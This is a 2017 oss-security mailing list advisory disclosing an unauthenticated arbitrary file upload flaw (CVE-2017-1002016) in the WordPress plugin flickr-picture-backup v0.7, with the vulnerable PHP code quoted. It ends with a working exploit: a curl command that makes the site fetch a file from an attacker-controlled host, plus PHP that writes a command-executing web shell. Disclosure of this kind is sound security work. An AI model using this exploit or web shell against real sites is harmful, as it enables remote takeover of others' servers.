|
Message-id: <968B1E14-0721-4973-8564-EEA02685D040@me.com> Date: Sun, 30 Apr 2017 12:45:47 -0400 From: "Larry W. Cashdollar" <larry0@...com> To: Open Source Security <oss-security@...ts.openwall.com> Subject: Arbitrary file upload vulnerability in Wordpress plugin flickr-picture-backup v0.7 Title: Arbitrary file upload vulnerability in Wordpress plugin flickr-picture-backup v0.7 Author: Larry W. Cashdollar, @_larry0 Date: 2017-04-26 CVE-ID:[CVE-2017-1002016] Download Site: https://wordpress.org/plugins/flickr-picture-backup/ Vendor: http://daozhao.goflytoday.com/ Vendor Notified: 2017-04-26 Vendor Contact: Advisory: http://www.vapidlabs.com/advisory.php?v=190 Description: Backup flickr’s picture which in page/post External links to flickr’s picture. Vulnerability: The code in flickr-picture-download.php doesn't check to see if the user is authenticated or that they have permission to upload files. It also doesn't check what type of file is being uploaded. define('WP_ADMIN', TRUE); require_once('../../../wp-load.php'); require_once(ABSPATH . 'wp-admin/includes/admin.php'); //require_once("./flickr-picture-backup.php"); //echo "flickr-picture-download.php"; if($_GET["url"]) { $url = $_GET["url"]; $fl = wp_daozhao_download_flickr_picture($url); if ( is_wp_error($fl) ) { echo "FALSE:" . $fl->get_error_message(); } else { wp_daozhao_flickr_backupfile_exists($url,$returl); echo "OK:" . $returl ; } //echo wp_daozhao_flickr_backup_urlpath(); //echo "OK"; } Export: JSON TEXT XML Exploit Code: • $ curl http://example.com/wp-content/plugins/flickr-picture-backup/flickr-picture-download.php -d "url=http://myhost/shell.php" • • Where shell.php is code to print out php web shell code, something like: • • <?php • echo "<?php\n\$cmd=\$_GET['cmd'];\nsystem(\$cmd);\n?>\n"; • ?> • • Upon exploitation your shell is in: • • http://example.com/wp-content/uploads/flickr_backup/shell.php
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.